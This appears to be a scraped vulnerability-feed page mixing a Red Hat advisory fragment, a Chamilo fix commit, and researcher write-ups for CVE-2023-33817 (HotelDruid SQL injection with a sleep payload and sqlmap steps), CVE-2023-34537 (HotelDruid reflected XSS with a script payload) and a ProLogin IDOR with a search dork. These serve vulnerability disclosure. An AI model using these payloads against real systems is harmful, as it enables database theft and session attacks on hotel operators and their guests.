https://access.redhat.com/security/cve/CVE-2023-25815  
https://access.redhat.com/security/cve/CVE-2023-27535  
https://access.redhat.com/security/cve/CVE-2023-27539  
https://access.redhat.com/security/cve/CVE-2023-28120  
https://access.redhat.com/security/cve/CVE-2023-29007  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIfBndzjgjWX9erEAQj/Vg/8D/xYKPgCJDjD2IbguRkgOWsZ5r5BP36n  
pbizOqZem1fs5J1oxmKotej5vE/BD5iumTsNYY59E1y/MjrBYPkaTjnHwgxkNYq/  
Lptwmt7pc2jE92E4qUMa5LpUhJxLQfw10SAMmYFVJIqOjVh+82XhU5NW5bJYStRs  
767suxjFzYZs8CHwpVyBVqEfI/sCyU+Ok3Pja5McaPjomAt9cNYfXoaPUSq3UMMD  
ifVOjVz3fE8YY6UhmVY5SPHrG4Ak2YcKOpyJ/A3UjRuKOTrtnLSxtLZisH4UMetZ  
R0e2ovt1TP4emH9Cblhl18qZxfi6RsveAwQ3IUplCltSRMbl7hrLB11cbAUUoPPc  
+MGvw6id7BHpH/0pBR1u7HH04VlzK/J1/pAiJNR3uL8W4OomgF9A5oSXSoJ9mY9C  
hFjUvQp7rR3+l9ivIT5pb//7lGBJs+QIn/W8OJXWEdqUMpC1ybPnJX7+azLUjLAt  
w7WEuMS7usNdDAUzP/sYFVlHfsNtOKHvx8c+DUi8ti9gkaXakw6VZIUh0g3ZUvmi  
hUWP7oktj6dZyISk75TpmpPppL5pmlKoHREJgiohSXUnFtp/XsYRAoZRfMbbqKr4  
MmyT7J11sfRH5+M1294PtdYJodXu13GESfjW38urAhVE/1SLpvWMQTv7U9CnDimF  
m78/igCYu/A=NjOC  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3495-01

hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability.

**CVE-2023-33817 - SQL-Injection-found-in-HotelDruid-3.0.5**

HotelDruid v3.0.5 are vulnerable to SQL injection. An attacker could issue arbitrary sql command to retrieve data in databases or even execute remote code execution on target database system

This is my second repo. Don't beat me if i didn't explain well.

Description of product : Hoteldruid is an open source program for hotel management (property management software) developed by DigitalDruid.Net.

Description of vulnerability : We found that this web application allowed any authenticated user such as admin or any user to inject malicious sql command into affected parameter to retrieve data in databases or even execute code execution on target system. Below are the steps to reproduce and again, dont beat me if i didn’t explain well.

Affected Webpage : creaprezzi.php Affected Parameter&Component :

inizioperiodo1 fineperiodo1 inizioperiodo2 fineperiodo2 inizioperiodo3 fineperiodo3 inizioperiodo4 &fineperiodo4 inizioperiodo5 fineperiodo5 inizioperiodo6 fineperiodo6 inizioperiodo7 fineperiodo7

Step 1: login and navigate to creaprezzi.php , the highligted part is the affected parameter in GUI

Step 2 : Intercept with BurpSuite, and insert some basic payload like " '%2b(select\*from(select(sleep(10)))a)%2b' " and monitor the response. the sceenshot below shows the server have returns the response after 10 seconds , it seems we can move abit deeper :-) .

Step 3 : what if we save this into a burp file and pass it to sqlmap? The screenahot below shows the result of sqkmap.

Step 4 : We can expand abit more with below sqlmap command, i choose sql-shell . The screenshot below shown we can even execute sql command by abusing the vulnerable parameter.

Ps : Above steps is just POC for vendor, actually i have climb from sql-shell to fully OS command shell, but this may need more and more steps and technique involved and i think this is beyond what CVE request us to demo .

Screenshot below show the version of HotelDruid

CVE-2023-33817: GitHub - leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5

An arbitrary file upload vulnerability in the /fileUpload.lib.php component of Chamilo 1.11.* up to v1.11.18 allows attackers to execute arbitrary code via uploading a crafted SVG file.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Case Studies
    
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   In this repository All GitHub
    

*   No suggested jump to results

*   In this repository All GitHub
    
*   In this organization All GitHub
    
*   In this repository All GitHub
    

Sign in

Sign up

chamilo / **chamilo-lms** Public

*   Notifications
*   Fork 441
*   Star 685
    

*   Code
*   Issues 436
*   Pull requests 27
*   Actions
*   Projects
*   Wiki
*   Security
*   Insights

More

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

Vendor: Require enshrined/svg-sanitize

*   Loading branch information

AngelFQC committed

Jun 2, 2023

1 parent d0cc583 commit f6e8355

Showing **1 changed file** with **1 addition** and **0 deletions**.

1 change: 1 addition & 0 deletions composer.json

Show comments View file

Expand Up

@@ -59,6 +59,7 @@

"doctrine/orm": "~2.5",

"emojione/emojione": "1.3.0",

"endroid/qr-code": "2.5.\*",

"enshrined/svg-sanitize": "^0.16.0",

"essence/essence": "2.6.1",

"ezyang/htmlpurifier": "~4.9",

"facebook/php-sdk-v4": "~5.0",

Expand Down

**0 comments on commit f6e8355**

Please sign in to comment.

CVE-2023-34944: Vendor: Require enshrined/svg-sanitize · chamilo/chamilo-lms@f6e8355

A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.

**CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5**

HotelDruid v3.0.5 are vulnerable to multipe XSS vulnerability. These vulnerabilities could allow remote authenticated attackers to inject arbitrary web script or HTML.

This is my third repo. Don't beat me if i didn't explain well.

Description of product : Hoteldruid is an open source program for hotel management (property management software) developed by DigitalDruid.Net.

Description of vulnerability : We found that this web application allowed any authenticated user to inject arbitrary web script or HTML into affected parameter and again, dont beat me if i didn’t explain well.

Affected Webpage : creaprezzi.php Affected Webpage : crearegole.php Affected Parameter&Component : tipotariff from creaprezzi.php Affected Parameter&Component : inizioperiodo from crearegole.php

Step 1: login and navigate to creaprezzi.php , the highligted part is the affected parameter in GUI

Step 2: Select the drop down list, it could be any and intercept with Burpsuite , then add the this payload after parameter tipotariff + your selectuon ID

payload used : a19yc%22%3e%3cscript%3ealert("THIS IS XSS FROM BB")%3c%2fscript%3emjf9oc2183m

Step 3: Forward and Enjoy :-) .

Second Affected Webpage

Step 1 : login and navigate to crearegole.php , Screenshot below shows the affected parameter

Step 2 : you can just intercept with burp and added the xss payload after affected parameter. payload used : a19yc%22%3e%3cscript%3ealert("THIS IS XSS FROM BB")%3c%2fscript%3emjf9oc2183m

Step 3 : Forward and Enjoy .

PS: Vendor have acknowledged and will release the bug fixes in next version. no coffee for BB.....Zzzz

CVE-2023-34537: GitHub - leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5

ProLogin version 1.9 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : ProLogin V1.9 Insecure Direct Object Reference Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://codecanyon.net/item/pro-login-advanced-secure-php-user-management-system/12388905?s_rank=169               |  | # Dork      : "Login - ProLogin"                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /index.php/user_settings[-] When you add value (user_settings) after the index.php/,     an error page appears At the same time, it shows you the panel & limited control .[+] http://127.0.0.1/support.ihorizon.sa/index.php/user_settingsGreetings to :=============================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*|===========================================================================================

Tag

#php